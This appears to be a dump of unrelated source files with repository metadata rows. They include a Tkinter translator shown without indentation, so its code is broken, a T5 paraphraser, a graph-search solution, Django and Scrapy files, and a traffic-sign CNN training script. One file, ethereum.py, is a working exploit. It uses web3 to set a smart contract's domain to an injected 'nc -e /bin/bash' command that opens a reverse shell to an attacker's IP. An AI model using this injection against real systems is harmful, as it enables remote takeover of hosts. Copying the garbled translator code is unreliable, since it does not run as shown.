root.title("The Ultimate Translator")
var1 = StringVar(root)
var1.set("Choose Language")
var2 = StringVar(root)
var2.set("Choose Language")
var3 = StringVar(root)
var3.set("Choose Accent")
drop_menu=OptionMenu(root,var1,'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh')
drop_menu.grid(row=1,column=0, pady=15, padx=15)
drop_menu=OptionMenu(root,var2,'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh')
drop_menu.grid(row=1,column=1, pady=15, padx=15)
drop_menu=OptionMenu(root,var3,'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh')
drop_menu.grid(row=1,column=2, pady=15, padx=15)
translation_lang_code='en'
def translate():
translation_lang= var2.get()
lang=[ 'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh']
code=['ar', 'bn', 'ca', 'zh', 'cs', 'da', 'nl', 'en', 'fi', 'fr', 'de', 'el', 'hi', 'hu', 'id', 'it', 'ja', 'ko', 'la', 'lv', 'no', 'pl', 'pt', 'ro', 'ru', 'sk', 'es', 'sv', 'th', 'tr', 'vi', 'cy']
for i in range(32):
if translation_lang==lang[i]:
translation_lang_code=code[i]
text=e1.get()
translator= Translator(to_lang=translation_lang)
translation = translator.translate(text)
print translation
def speak():
translation_lang= var1.get()
lang=[ 'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh']
code=['ar', 'bn', 'ca', 'zh', 'cs', 'da', 'nl', 'en', 'fi', 'fr', 'de', 'el', 'hi', 'hu', 'id', 'it', 'ja', 'ko', 'la', 'lv', 'no', 'pl', 'pt', 'ro', 'ru', 'sk', 'es', 'sv', 'th', 'tr', 'vi', 'cy']
for i in range(32):
if translation_lang==lang[i]:
translation_lang_code=code[i]
text=e1.get()
translator= Translator(to_lang=translation_lang)
translation = translator.translate(text)
tts = gTTS(translation, lang=translation_lang_code)
tts.save("good.mp3")
os.system("mpg321 good.mp3")
os.startfile('good.mp3')
def accent():
translation_lang= var3.get()
lang=[ 'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh']
code=['ar', 'bn', 'ca', 'zh', 'cs', 'da', 'nl', 'en', 'fi', 'fr', 'de', 'el', 'hi', 'hu', 'id', 'it', 'ja', 'ko', 'la', 'lv', 'no', 'pl', 'pt', 'ro', 'ru', 'sk', 'es', 'sv', 'th', 'tr', 'vi', 'cy']
for i in range(32):
if translation_lang==lang[i]:
translation_lang_code=code[i]
text=e1.get()
tts = gTTS(text, lang=translation_lang_code)
tts.save("good.mp3")
os.system("mpg321 good.mp3")
os.startfile('good.mp3')
Label(root, text="Enter Text in English").grid(row=0)
e1 = Entry(root, width=34, bg="green")
e1.grid(row=0, column=1, pady=15, padx=15 , columnspan = 20)
Button(root, text='Speak in Language', command=speak).grid(row=3, column=0, pady=15, padx=15)
Button(root, text='Translate', command=translate).grid(row=3, column=1, pady=15, padx=15)
Button(root, text='Speak in Accent', command=accent).grid(row=3, column=2, pady=15, padx=15)
Label(root, text="Translated Text:"). grid(row=5, column=0, pady=15, padx=15)
root.mainloop()
| [
"noreply@github.com"
] | abhishekmishramm1997.noreply@github.com |
a0cebb757575153ad2bb5bc1bdb9c88feeb14741 | 7deb6623a548af583decbad5b3772611fd051328 | /Synonym_Replacer/Paraphraser.py | 34bbac7ad224f4ef0a9b811b767bb0844787589e | [] | no_license | lzontar/Text_Adaptation_To_Context | a77aa4a16849c30363949964ca351cebbdbf7772 | c87cba96bd10528bcf709d0b8a0a1991a82aec8a | refs/heads/master | 2022-12-10T21:28:41.314416 | 2020-08-23T18:54:34 | 2020-08-23T18:54:34 | 287,771,498 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | import re
import Text_Characteristics.Text_Characteristics as tc
import torch
from transformers import T5ForConditionalGeneration, T5Tokenizer
import Common.library.Common as com
def adapt_complexity_and_polarity(model, tokenizer, device, adaptation_dto, mean_measures, n_iterations, epsilon, text_characteristics, debug):
sentences,_ = com.calc_sentence_similarity(adaptation_dto.adapted_text())
text = adaptation_dto.adapted_text()
rel_polar = abs((adaptation_dto.text_measures()['SENT_ANAL']['POLAR'] - mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR']) / mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR'])
rel_read = abs((
adaptation_dto.text_measures()['READ'] - mean_measures['READ'][adaptation_dto.target_pub_type()]) / \
mean_measures['READ'][adaptation_dto.target_pub_type()])
curr_diff = rel_polar + rel_read
for s in sentences:
if n_iterations == 0 or abs(curr_diff) <= epsilon:
break
sentences_result = com.split_into_sentences(text)
paraphrases = generate_sequences(model, tokenizer, device, s[1])
best_paraphrase = None
best_paraphrase_text = None
best_paraphrase_diff = None
for p in paraphrases:
replaced_list = [p if x == s[1] else x for x in sentences_result]
replaced_text = " ".join(replaced_list)
curr_polar_with_para = text_characteristics.calc_polarity_scores(replaced_text)
curr_read_with_para = com.flesch_reading_ease(replaced_text)
rel_polar_with_para = abs((
curr_polar_with_para - mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR']) / \
mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR'])
rel_read_with_para = abs((curr_read_with_para - mean_measures['READ'][adaptation_dto.target_pub_type()]) / \
mean_measures['READ'][adaptation_dto.target_pub_type()])
curr_diff_with_para = rel_polar_with_para + rel_read_with_para
if best_paraphrase is None or (curr_diff_with_para < best_paraphrase_diff):
best_paraphrase = p
best_paraphrase_text = replaced_text
best_paraphrase_diff = curr_diff_with_para
if best_paraphrase is not None and best_paraphrase != s[1] and curr_diff > best_paraphrase_diff:
text = best_paraphrase_text
if debug:
print("Replacing '", s[1], "' for '", best_paraphrase, "'")
print("Relative difference after replacement: ", best_paraphrase_diff)
curr_diff = best_paraphrase_diff
n_iterations = n_iterations - 1
adaptation_dto.adapted_text(text)
return adaptation_dto
def set_seed(seed):
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(seed)
def generate_sequences(model, tokenizer, device, sentence):
set_seed(42)
text = "paraphrase: " + sentence + " </s>"
max_len = 256
encoding = tokenizer.encode_plus(text, pad_to_max_length=True, return_tensors="pt")
input_ids, attention_masks = encoding["input_ids"].to(device), encoding["attention_mask"].to(device)
# set top_k = 50 and set top_p = 0.95 and num_return_sequences = 3
beam_outputs = model.generate(
input_ids=input_ids, attention_mask=attention_masks,
do_sample=True,
max_length=256,
top_k=120,
top_p=0.98,
early_stopping=True,
num_return_sequences=10
)
final_outputs = []
for beam_output in beam_outputs:
sent = tokenizer.decode(beam_output, skip_special_tokens=True, clean_up_tokenization_spaces=True)
if sent.lower() != sentence.lower() and sent not in final_outputs:
final_outputs.append(sent)
return final_outputs
| [
"zontarluka98@gmail.com"
] | zontarluka98@gmail.com |
7e2974f9de7a5d5e34105cf131643c825f8338db | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02991/s030157837.py | 6e3b67de9db4e8ee071c1c288612c95cbf324ab6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | import sys
input = sys.stdin.buffer.readline
from collections import deque
def main():
N,M = map(int,input().split())
edge =[[] for _ in range(N)]
for _ in range(M):
u,v = map(int,input().split())
edge[u-1].append(v-1)
S,T = map(int,input().split())
q = deque()
go = [[False for _ in range(3)] for _ in range(N)]
q.append((S-1,0,1))
while q:
now,step,d = q.popleft()
if step == 3:
if now == T-1:
print(d)
exit()
step = 0
d += 1
if go[now][step]:
continue
go[now][step] = True
for fol in edge[now]:
q.append((fol,step+1,d))
print(-1)
if __name__ == "__main__":
main() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
3cf805eebecd42487d997e568974b7ddd8ac7f4e | 13de6b83b73c46b8221739edb21594bbc3784879 | /simblefaron/utils/tests/test_get_test_data.py | 361367c8d378c2930c83f983b1dc1702158e05f3 | [] | no_license | I2Cvb/simblefaron | fc068b2d41ffa88c5b67e3c3ae6dd637db868d25 | 053906292b2ab21a76387d519de3043f27ed3bed | refs/heads/master | 2021-01-19T05:20:28.144042 | 2016-06-30T14:46:29 | 2016-06-30T14:46:29 | 61,811,381 | 0 | 1 | null | 2016-06-30T14:46:31 | 2016-06-23T14:25:26 | Python | UTF-8 | Python | false | false | 316 | py | """Test the module get_test_data."""
from __future__ import print_function
from simblefaron.utils import Get_test_data
def test_pipeline():
"""Test the get_test_data function.
.. todo::
ensure that the download and unencripted data has the right SHA1
"""
print('Test Get_test_data')
| [
"sik@visor.udg.edu"
] | sik@visor.udg.edu |
996339b2d5f97720cb4f6779affdae2d70fef420 | d8cbc94a4207337d709a64447acb9c8fe501c75a | /subset_selection/code/cli.py | 54738e4db5034a5f1e4316b6792e9c41b4e53b4e | [
"MIT"
] | permissive | sripathisridhar/acav100m | 6f672384fa723a637d94accbbe11a9a962f5f87f | 13b438b6ce46d09ba6f79aebb84ad31dfa3a8e6f | refs/heads/master | 2023-09-06T01:05:21.188822 | 2021-11-18T08:08:08 | 2021-11-18T08:08:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,111 | py | import time
import datetime
from pathlib import Path
import fire
from args import get_args
from run import run_single
from run_contrastive import run_single_contrastive
from chunk import run_chunks, reduce_all_pkls
from chunk_contrastive import run_chunks_contrastive
from save import merge_all_csvs
from merge_contrastive import merge_contrastive
from tests import compare_measures
class Cli:
def prepare(self, **kwargs):
args = get_args(**kwargs)
if 'out_path' in kwargs:
args.data.output.path = Path(kwargs['out_path'])
opath = args.data.output.path
if opath.stem == opath.name:
# potential dir
opath = opath / 'output.csv'
opath.parent.mkdir(parents=True, exist_ok=True)
args.data.output.path = opath
if 'shards_path' in kwargs:
args.data.path = Path(kwargs['shards_path'])
if 'meta_path' in kwargs:
args.data.meta.path = Path(kwargs['meta_path'])
mpath = args.data.meta.path
if mpath is None:
# use shard directory
mpath = args.data.path.parent
if not mpath.is_dir() and mpath.parent.is_dir():
mpath = mpath.parent
args.data.meta.path = mpath
return args
def run(self, **kwargs):
start = time.time()
args = self.prepare(**kwargs)
run(args)
elasped = time.time() - start
elasped = str(datetime.timedelta(seconds=elasped))
print('done. total time elasped: {}'.format(elasped))
def reduce_csvs(self, **kwargs):
start = time.time()
args = self.prepare(**kwargs)
merge_all_csvs(args)
elasped = time.time() - start
elasped = str(datetime.timedelta(seconds=elasped))
print('done. total time elasped: {}'.format(elasped))
def reduce_pkls(self, **kwargs):
start = time.time()
args = self.prepare(**kwargs)
reduce_all_pkls(args)
elasped = time.time() - start
elasped = str(datetime.timedelta(seconds=elasped))
print('done. total time elasped: {}'.format(elasped))
def reduce(self, **kwargs):
start = time.time()
args = self.prepare(**kwargs)
if args.save_cache_as_csvs:
merge_all_csvs(args)
else:
reduce_all_pkls(args)
elasped = time.time() - start
elasped = str(datetime.timedelta(seconds=elasped))
print('done. total time elasped: {}'.format(elasped))
def compare_measures(self, **kwargs):
args = self.prepare(**kwargs)
compare_measures(args)
print('done')
def merge_contrastive(self, **kwargs):
args = self.prepare(**kwargs)
merge_contrastive(args)
def run(args):
if args.measure_name == 'contrastive':
if args.chunk_size is None:
run_single_contrastive(args)
else:
run_chunks_contrastive(args)
else:
if args.chunk_size is None:
run_single(args)
else:
run_chunks(args)
if __name__ == '__main__':
fire.Fire(Cli)
| [
"sangho.lee@vision.snu.ac.kr"
] | sangho.lee@vision.snu.ac.kr |
7d0bb2145b682a56819a8dc7a30bc7d8561baf3c | 2efbd900dd39b2acd255b7ea9d6a7cc7d1a88b8b | /ethereum.py | dcd0360f3ee29a2ce8fc589cc9a6e428cfcc5dd1 | [] | no_license | dyloot43/web3 | c51a6d5a6c72c27f06686b2a6b6deef0ba770e26 | cda807ef662ffb9e67fcb1a78f14449331d8ff6e | refs/heads/master | 2020-07-18T09:39:31.484065 | 2019-09-04T03:31:10 | 2019-09-04T03:31:10 | 206,223,549 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | from web3 import Web3
import json
with open('address.txt') as fh:
address = fh.read().replace('\n','')
with open('WeaponizedPing.json') as fh:
contractData = json.load(fh)
rpcURL = 'http://ATTACKIPADDRESS:PORT/'
w3 = Web3(Web3.HTTPProvider(rpcURL))
w3.eth.defaultAccount = w3.eth.accounts[0]
contract = w3.eth.contract(address = address, abi = contractData['abi'])
print('Current Domain: ' + contract.functions.getDomain().call())
w3.eth.waitForTransactionReceipt(contract.functions.setDomain('YOURIPADDRESS').transact())
print('New Domain: ' + contract.functions.getDomain().call())
#IF THE SCRIPT WORKS SO FAR REPLACE THE BOTTOM TO THE TOP
domain = 'YOUR IPADDRESS; nc -e /bin/bash YOURIPADDRESS 80'
print('Current Domain: ' + contract.functions.getDomain().call())
w3.eth.waitForTransactionReceipt(contract.functions.setDomain(domain).transact())
print('New Domain: ' + contract.functions.getDomain().call())
| [
"noreply@github.com"
] | dyloot43.noreply@github.com |
963c167d44a02ee7f19c26dbeba47a51b216ea2b | 0acd8226bb830f291acc5f9ee24b5ef04c51b401 | /pythons/syn/main.py | 1560acf1ff80e2ca178c8c9270f889a5a1e13d67 | [] | no_license | jiafangtao/web_programming | f97eb884487afdbe5a0477f7b54d36546ce670db | 33f8943c91330c30677aa0518f21eb823441e344 | refs/heads/master | 2023-08-31T18:11:45.335547 | 2023-08-08T06:36:44 | 2023-08-08T06:36:44 | 90,827,978 | 0 | 0 | null | 2023-08-08T06:36:45 | 2017-05-10T06:19:59 | JavaScript | UTF-8 | Python | false | false | 750 | py |
class SomeType(object):
typeName = "Some Fancy Type"
@classmethod
def change_type_name(cls, new_type_name):
print("<debug> I want to know the original class variable '{}'".format(
cls.typeName))
cls.typeName = new_type_name
print('typeName was changed to "{}"'.format(cls.typeName))
def __init__(self, sku="unknown"):
self._sku = sku
print(self.typeName)
print(SomeType.typeName)
if __name__ == '__main__':
print('start hacking...')
print(SomeType.typeName)
print("creating object st......")
st = SomeType("iphonex_256_black")
st.change_type_name("ugly type")
print("creting object another st......")
another_st = SomeType("jeep2019_4x")
| [
"bruce.jia@autodesk.com"
] | bruce.jia@autodesk.com |
05cc7ee1f93c729b0070292a6f1440ac972ef77d | ae2eafa1c12fa86ab615f9a6ae9fd1b29097d842 | /urlspider/urlspider/pipelines.py | 50bb10682711607335a524f3038d3e35cebff5a3 | [] | no_license | StarryPath/urlspider--v2.0 | 44b99c8fabbee12a3ff9c78a536c6fc4799f0e12 | f731fd8520ac62afb086dcee5d171b655da7bee0 | refs/heads/master | 2021-08-23T20:19:56.065838 | 2017-12-06T11:17:05 | 2017-12-06T11:17:05 | 113,306,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,627 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import signals
import json
import codecs
from twisted.enterprise import adbapi
from datetime import datetime
from hashlib import md5
import time
import MySQLdb
import MySQLdb.cursors
a=int(time.time())
class UrlspiderPipeline(object):
def __init__(self):
try:
self.dbpool = adbapi.ConnectionPool('MySQLdb',
host='localhost',
db='test',
user='root',
passwd='',
cursorclass=MySQLdb.cursors.DictCursor,
charset='utf8',
use_unicode=True
)
print "Connect to db successfully!"
except:
print "Fail to connect to db!"
def process_item(self, item, spider):
self.dbpool.runInteraction(self.insert_into_table, item)
return item
def insert_into_table(self, conn, item):
sql = "insert ignore into biao4(url,flag) values(%s,%s) "
param = (item['url'],item['flag'])
conn.execute(sql, param)
sql2 = "insert into biao5(fromWhere,toWhere) values(%s,%s) "
param2 = (item['fromWhere'],item['url'])
conn.execute(sql2, param2) | [
"noreply@github.com"
] | StarryPath.noreply@github.com |
8682d297b669ec8bf068024bf83d1af0809f578d | 1d44dde530578dade69f004c5828e31eee28cb55 | /questions/urls.py | 1ed06151fa2e7fc4cb3cb03915d105509f8997b1 | [] | no_license | SmartFastSolution/socialprojectupse | 98fe15c6d6499356bce32e8b25a1139a6c31b535 | d0fcecdf6bd033836952af400cb4b54a485f21b8 | refs/heads/master | 2023-07-19T03:57:45.261985 | 2021-08-26T19:08:27 | 2021-08-26T19:08:27 | 385,042,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from django.urls import path
from .views import QuestionView,ResultView,ReportView
from questions import views
urlpatterns = [
path('',QuestionView.as_view(),name="q_list"),
path('result/', ResultView.as_view(), name='result'),
path('report/', ReportView.as_view(), name='report')
] | [
"70552382+SmartFastSolution@users.noreply.github.com"
] | 70552382+SmartFastSolution@users.noreply.github.com |
4bb0c78ca364137100e6cdc76d895a163a064c7e | 323721fbefefb26c4b61fec63c29ee7e0f2ce83d | /seolog/article/models.py | 6d1fc43da6b108b755709e684ce059d2eb964c70 | [] | no_license | asghara04/seolog | 4fa52febf2ffb7e7a3c7b1e3ff50c6870abaf57f | c80925221d6aa45f239ef7f28565876b7b9eb33f | refs/heads/master | 2023-06-26T09:15:32.777179 | 2021-07-05T18:06:14 | 2021-07-05T18:06:14 | 379,360,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | from django.db import models
from django.contrib.auth.models import User
class Article(models.Model):
title = models.CharField(
max_length=250,
verbose_name="title"
)
slug = models.SlugField(
max_length=250,
verbose_name="slug",
unique=True
)
image = models.ImageField(
upload_to="Article Images/%Y/%m",
verbose_name="image"
)
description = models.TextField(
max_length=400,
verbose_name="description"
)
body = models.TextField(
max_length=10000,
verbose_name="body"
)
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
verbose_name="author"
)
pubdate = models.DateTimeField(auto_now_add=True)
update = models.DateTimeField(auto_now=True)
objects = models.Manager()
def __str__(self):
return self.title
class Meta:
ordering = ("-id",) | [
"asgharale2021@gmail.com"
] | asgharale2021@gmail.com |
ab2476f61c29443a074f4e51a9e0c5e84be187ce | 1d8d77e2eaff30218d4c04cc50e051540bed9624 | /train.py | c1ba0004705fb6e347c1a49a83f9e0b2aabd8d87 | [
"MIT"
] | permissive | anoop600/Traffic-Sign-Analysis-CNN | 42c91253a7de35990412bf09f6ae9838ab690536 | a2a81cc0e31f5beec3992b9a5f38d462390da2b6 | refs/heads/master | 2020-03-26T09:29:10.833778 | 2018-08-14T17:24:13 | 2018-08-14T17:24:13 | 144,751,061 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,207 | py | #!/usr/bin/env python
# # Self-Driving Car
#
# ## CNN Based Traffic Sign Recognition Classifier
#
########################DISABLE TENSORFLOW WARNING###############
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
#################################################################
#########################DATABASE################################
import MySQLdb as my
db = my.connect("127.0.0.1","root","","pythondb")
cursor = db.cursor()
sql = "UPDATE `task` SET value = 0 WHERE slno=1;"
cursor.execute(sql)
db.commit()
cursor = db.cursor()
sql = "select epoch from `epoch` where id=1;"
cursor.execute(sql)
result= cursor.fetchall()
for row in result:
EPOCHS = row[0]
#########################END-DATABASE#######################################
# Load pickled data
import pickle
# TODO: Fill this in based on where you saved the training and testing data
training_file = "train.p"
validation_file= "valid.p"
testing_file = "test.p"
with open(training_file, mode='rb') as f:
train = pickle.load(f)
with open(validation_file, mode='rb') as f:
valid = pickle.load(f)
X_train, y_train = train['features'], train['labels']
X_valid, y_valid = valid['features'], valid['labels']
############################################################################
# ---
#
# ## Dataset Summary & Exploration
#
# The pickled data is a dictionary with 4 key/value pairs:
# - 'features'
# - 'labels'
############################################################################
#### About Data#####
import numpy as np
# Number of training examples
n_train = X_train.shape[0]
# shape of an traffic sign images
image_shape = X_train.shape[1:]
# How many unique classes/labels there are in the dataset.
n_classes = len(np.unique(y_train))
print("Number of training examples =", n_train)
print("Image data shape =", image_shape)
print("Number of classes =", n_classes)
###################### Visualization of the dataset#########################
##FINAL PLOT OF GRAPH ####
import matplotlib.pyplot as plt
import random
z=50
def plot_figures(figures, nrows = 1, ncols=1, labels=None):
fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(12, 2))
axs = axs.ravel()
for index, title in zip(range(len(figures)), figures):
axs[index].imshow(figures[title], plt.gray())
if(labels != None):
axs[index].set_title(labels[index])
else:
axs[index].set_title(title)
axs[index].set_axis_off()
plt.tight_layout()
global z
kurs = "images/ratio/%i.png" % z
z=z+1
plt.savefig(kurs, format='png')
#############################################################################
name_values = np.genfromtxt('signnames.csv', skip_header=1, dtype=[('myint','i8'), ('mysring','S55')], delimiter=',')
unique_train, counts_train = np.unique(y_train, return_counts=True)
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.bar(unique_train, counts_train)
plt.grid()
plt.title("Train Dataset Sign Counts(Original)")
plt.savefig('./images/data/1.png')
plt.clf()
unique_valid, counts_valid = np.unique(y_valid, return_counts=True)
plt.bar(unique_valid, counts_valid)
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.grid()
plt.title("Valid Dataset Sign Counts(Original)")
plt.savefig('./images/data/2.png')
plt.clf()
###################Generate fake data####################################
############ Augumentation and greyscale the image#######################
### Preprocess the data here. Preprocessing steps could include normalization, converting to grayscale, etc.
import tensorflow as tf
from tensorflow.contrib.layers import flatten
from sklearn.utils import shuffle
X_train_rgb = X_train
X_train_gray = np.sum(X_train/3, axis=3, keepdims=True)
X_valid_rgb = X_valid
X_valid_gray = np.sum(X_valid/3, axis=3, keepdims=True)
# Store the Greyscale images as the training, testing and validation data
X_train = X_train_gray
X_valid = X_valid_gray
# Test the data availabe so that we can see that data had been greyscaled
image_depth_channels = X_train.shape[3]
### Augumentation (Make Duplicate data)
import cv2
more_X_train = []
more_y_train = []
more2_X_train = []
more2_y_train = []
new_counts_train = counts_train
#print(new_counts_train)
for i in range(n_train):
if(new_counts_train[y_train[i]] < 3000):
for j in range(3):
# cv2.warpAffine crops the input image
dx, dy = np.random.randint(-1.7, 1.8, 2)
M = np.float32([[1, 0, dx], [0, 1, dy]])
dst = cv2.warpAffine(X_train[i], M, (X_train[i].shape[0], X_train[i].shape[1]))
dst = dst[:,:,None]
more_X_train.append(dst)
more_y_train.append(y_train[i])
#cv2.getPerspectiveTransform ,transforms and saves
random_higher_bound = random.randint(27, 32)
random_lower_bound = random.randint(0, 5)
points_one = np.float32([[0,0],[32,0],[0,32],[32,32]])
points_two = np.float32([[0, 0], [random_higher_bound, random_lower_bound], [random_lower_bound, 32],[32, random_higher_bound]])
M = cv2.getPerspectiveTransform(points_one, points_two)
dst = cv2.warpPerspective(X_train[i], M, (32,32))
more2_X_train.append(dst)
more2_y_train.append(y_train[i])
#cv2.getRotationMatrix2D rotates the image
tilt = random.randint(-12, 12)
M = cv2.getRotationMatrix2D((X_train[i].shape[0]/2, X_train[i].shape[1]/2), tilt, 1)
dst = cv2.warpAffine(X_train[i], M, (X_train[i].shape[0], X_train[i].shape[1]))
more2_X_train.append(dst)
more2_y_train.append(y_train[i])
new_counts_train[y_train[i]] += 2
more_X_train = np.array(more_X_train)
more_y_train = np.array(more_y_train)
X_train = np.concatenate((X_train, more_X_train), axis=0)
y_train = np.concatenate((y_train, more_y_train), axis=0)
more2_X_train = np.array(more_X_train)
more2_y_train = np.array(more_y_train)
more2_X_train = np.reshape(more2_X_train, (np.shape(more2_X_train)[0], 32, 32, 1))
X_train = np.concatenate((X_train, more2_X_train), axis=0)
y_train = np.concatenate((y_train, more2_y_train), axis=0)
X_train = np.concatenate((X_train, X_valid), axis=0)
y_train = np.concatenate((y_train, y_valid), axis=0)
from sklearn.model_selection import train_test_split
X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train, test_size=0.2, random_state=0)
print("New Dataset Size : {}".format(X_train.shape[0]))
unique, counts = np.unique(y_train, return_counts=True)
# Plot the histogram
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.bar(unique, counts)
plt.grid()
plt.title("Train Dataset Sign Counts(After)")
plt.savefig('./images/data/3.png')
plt.clf()
unique, counts = np.unique(y_valid, return_counts=True)
# Plot the histogram
plt.rcParams["figure.figsize"] = [12, 5]
axes = plt.gca()
axes.set_xlim([-1,43])
plt.bar(unique, counts)
plt.grid()
plt.title("Valid Dataset Sign Counts(After)")
plt.savefig('./images/data/4.png')
plt.clf()
X_train_normalized = X_train/127.5-1
##########NORMALIZE TRAINING DATASET###########
X_train = X_train_normalized
###############################################
##### Model Architecture#####
#
# My final model consisted of the following layers:
#
# | Layer | Description |
# |:---------------------:|:---------------------------------------------:|
# | Input | 32x32x1 grayscale image |
# | Convolution 5x5 | 2x2 stride, valid padding, outputs 28x28x6 |
# | RELU | |
# | Max pooling | 2x2 stride, outputs 14x14x6 |
# | Convolution 5x5 | 2x2 stride, valid padding, outputs 10x10x16 |
# | RELU | |
# | Max pooling | 2x2 stride, outputs 5x5x16 |
# | Convolution 1x1 | 2x2 stride, valid padding, outputs 1x1x412 |
# | RELU | |
# | Fully connected | input 412, output 122 |
# | RELU | |
# | Dropout | 50% keep |
# | Fully connected | input 122, output 84 |
# | RELU | |
# | Dropout | 50% keep |
# | Fully connected | input 84, output 43 |
#
#define basic property of a layer
def conv2d(x, W, b, strides=1):
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='VALID')
x = tf.nn.bias_add(x, b)
print(x.shape)
return tf.nn.relu(x)
def LeNet(x):
mu = 0
sigma = 0.1
W_one = tf.Variable(tf.truncated_normal(shape=(5, 5, image_depth_channels, 6), mean = mu, stddev = sigma))
b_one = tf.Variable(tf.zeros(6))
layer_one = conv2d(x, W_one, b_one, 1)
layer_one = tf.nn.max_pool(layer_one, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
print(layer_one.shape)
print()
W_two = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean = mu, stddev = sigma))
b_two = tf.Variable(tf.zeros(16))
layer_two = conv2d(layer_one, W_two, b_two, 1)
layer_two = tf.nn.max_pool(layer_two, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
print(layer_two.shape)
print()
W_two_a = tf.Variable(tf.truncated_normal(shape=(5, 5, 16, 412), mean = mu, stddev = sigma))
b_two_a = tf.Variable(tf.zeros(412))
layer_two_a = conv2d(layer_two, W_two_a, b_two_a, 1)
print(layer_two_a.shape)
print()
flat = flatten(layer_two_a)
W_three = tf.Variable(tf.truncated_normal(shape=(412, 122), mean = mu, stddev = sigma))
b_three = tf.Variable(tf.zeros(122))
layer_three = tf.nn.relu(tf.nn.bias_add(tf.matmul(flat, W_three), b_three))
layer_three = tf.nn.dropout(layer_three, keep_prob)
W_four = tf.Variable(tf.truncated_normal(shape=(122, 84), mean = mu, stddev = sigma))
b_four = tf.Variable(tf.zeros(84))
layer_four = tf.nn.relu(tf.nn.bias_add(tf.matmul(layer_three, W_four), b_four))
layer_four = tf.nn.dropout(layer_four, keep_prob)
W_five = tf.Variable(tf.truncated_normal(shape=(84, 43), mean = mu, stddev = sigma))
b_five = tf.Variable(tf.zeros(43))
layer_five = tf.nn.bias_add(tf.matmul(layer_four, W_five), b_five)
return layer_five
x = tf.placeholder(tf.float32, (None, 32, 32, image_depth_channels))
y = tf.placeholder(tf.int32, (None))
one_hot_y = tf.one_hot(y, 43)
